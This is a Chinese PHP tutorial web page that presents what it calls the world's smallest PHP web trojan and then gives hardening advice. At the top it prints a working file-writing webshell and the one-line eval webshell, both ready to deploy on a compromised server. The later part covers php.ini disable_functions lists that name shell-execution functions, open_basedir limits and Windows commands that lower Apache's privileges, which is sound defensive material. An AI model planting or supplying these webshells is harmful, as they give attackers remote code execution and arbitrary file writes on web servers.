全世界最小的php网页木马一枚 附PHP木马的防范方法


Posted in PHP onOctober 09, 2009

php网页木马

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

一句话php木马
<?php eval($_POST[cmd]);?>

PHP木马的防范方法
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表,超文本预处理器(PHP: Hypertext Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。
一、防止php木马执行webshell
打开safe_mode, 在,php.ini中设置 disable_functions= passthru,exec,shell_exec,system 二者选一即可,也可都选。
二、防止跳出web目录
首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru,exec,shell_exec,system 后面加上php处理文件的函数,主要有 fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成为 disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile 。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。 如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft /add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。

下面是mcafee的安全设置,防止一些网页木马生成文件等。
https://3water.com/hack/list461_1.html

PHP 相关文章推荐
基于mysql的bbs设计(一)
Oct 09 PHP
php中看实例学正则表达式
Dec 25 PHP
PHP MemCached 高级缓存应用代码
Aug 05 PHP
php下通过curl抓取yahoo boss 搜索结果的实现代码
Jun 10 PHP
smarty中post用法实例
Nov 28 PHP
php实现删除空目录的方法
Mar 16 PHP
php提交post数组参数实例分析
Dec 17 PHP
PHP实现Google plus的好友拖拽分组效果
Oct 21 PHP
PHP实现双链表删除与插入节点的方法示例
Nov 11 PHP
Laravel中的chunk组块结果集处理与注意问题
Aug 15 PHP
PHP生成随机字符串实例代码(字母+数字)
Sep 11 PHP
Yii框架 session 数据库存储操作方法示例
Nov 18 PHP
PHP 字符串分割和比较
Oct 06 #PHP
PHP parse_url 一个好用的函数
Oct 03 #PHP
php面向对象全攻略 (十七) 自动加载类
Sep 30 #PHP
php面向对象全攻略 (十六) 对象的串行化
Sep 30 #PHP
php面向对象全攻略 (十五) 多态的应用
Sep 30 #PHP
php面向对象全攻略 (十四) php5接口技术
Sep 30 #PHP
php面向对象全攻略 (十二) 抽象方法和抽象类
Sep 30 #PHP
You might like
PHP的构造方法,析构方法和this关键字详细介绍
2013/10/22 PHP
你应该知道PHP浮点数知识
2015/05/13 PHP
PHP实现页面静态化的超简单方法
2016/09/06 PHP
PHP实现网站访问量计数器
2017/10/27 PHP
PHP基于redis计数器类定义与用法示例
2018/02/08 PHP
用于自动添加Digg This!按钮的JavaScript
2006/12/23 Javascript
javascript vvorld 在线加密破解方法
2008/11/13 Javascript
Javascript 面向对象编程(一) 封装
2011/08/28 Javascript
jQuery使用动态渲染表单功能完成ajax文件下载
2013/01/15 Javascript
js清空form表单中的内容示例
2014/05/20 Javascript
js clearInterval()方法的定义和用法
2015/11/11 Javascript
JS根据浏览器窗口大小实时动态改变网页文字大小的方法
2016/02/25 Javascript
如何使用jquery修改css中带有!important的样式属性
2016/04/28 Javascript
vue.js+Element实现表格里的增删改查
2017/01/18 Javascript
基于JavaScript实现下拉列表左右移动代码
2017/02/07 Javascript
BootStrap Table 后台数据绑定、特殊列处理、排序功能
2017/05/27 Javascript
jQuery ajax动态生成table功能示例
2017/06/14 jQuery
详解用node搭建简单的静态资源管理器
2017/08/09 Javascript
react 中父组件与子组件双向绑定问题
2019/05/20 Javascript
jquery 遍历hash操作示例【基于ajax交互】
2019/10/12 jQuery
vue实现计步器功能
2019/11/01 Javascript
Vue实现一种简单的无限循环滚动动画的示例
2021/01/10 Vue.js
[42:00]完美世界DOTA2联赛PWL S3 Phoenix vs INK ICE 第一场 12.13
2020/12/17 DOTA
深入理解python中的atexit模块
2017/03/07 Python
pandas 空的dataframe 插入列名的示例
2018/10/30 Python
Python+OpenCV采集本地摄像头的视频
2019/04/25 Python
Python zip函数打包元素实例解析
2019/12/11 Python
意大利咖啡、浓缩咖啡和浓缩咖啡机:illy caffe
2019/03/20 全球购物
函授本科毕业自我鉴定
2013/10/09 职场文书
商务邀请函范文
2014/01/14 职场文书
小学六年级学生评语
2014/04/22 职场文书
幼儿园六一儿童节活动方案
2014/08/26 职场文书
中班上学期个人总结
2015/02/12 职场文书
农业项目合作意向书
2015/05/08 职场文书
班主任培训研修日志
2015/11/13 职场文书
Python-typing: 类型标注与支持 Any类型详解
2021/05/10 Python